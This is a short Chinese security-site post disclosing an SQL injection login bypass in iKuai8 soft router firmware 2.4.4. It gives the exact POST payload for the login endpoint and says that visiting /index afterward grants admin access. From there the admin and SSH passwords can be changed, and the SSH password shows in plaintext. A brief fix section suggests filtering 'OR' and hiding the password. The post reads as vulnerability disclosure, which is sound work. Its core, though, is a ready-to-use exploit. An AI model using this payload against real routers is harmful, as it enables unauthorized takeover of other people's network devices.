爱快软路由最新版IOS使用sql盲注绕过登录-华盟网

爱快软路由最新版IOS使用sql盲注绕过登录

华盟学院山东省第二期线下学习计划

  版本号iKuai8_2.4.4_Build20150604

  漏洞地址:192.168.163.100/login/x

  POST表单:pass=&user=-1%22%20OR%203*2*1=6%20AND%20000380=000380%20--

  发送POST表单之后访问/index即可进入后台

  可直接修改管理员密码 SSH密码 SSH密码在后台明文存储 存在被控制的风险即傀儡机

  SSH密码使用审查元素即可看到=。= 开发同学这样不行的说

  漏洞证明:

 
 
爱快软路由最新版IOS使用sql盲注绕过登录
爱快软路由最新版IOS使用sql盲注绕过登录
爱快软路由最新版IOS使用sql盲注绕过登录
   

  修复方案:

  过滤OR

  网页不要显示SSH明文密码

www.idc126.com

原文地址:https://hack.77169.com/201508/207591.shtm

本文由 华盟网 作者:怪狗 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。
0

发表评论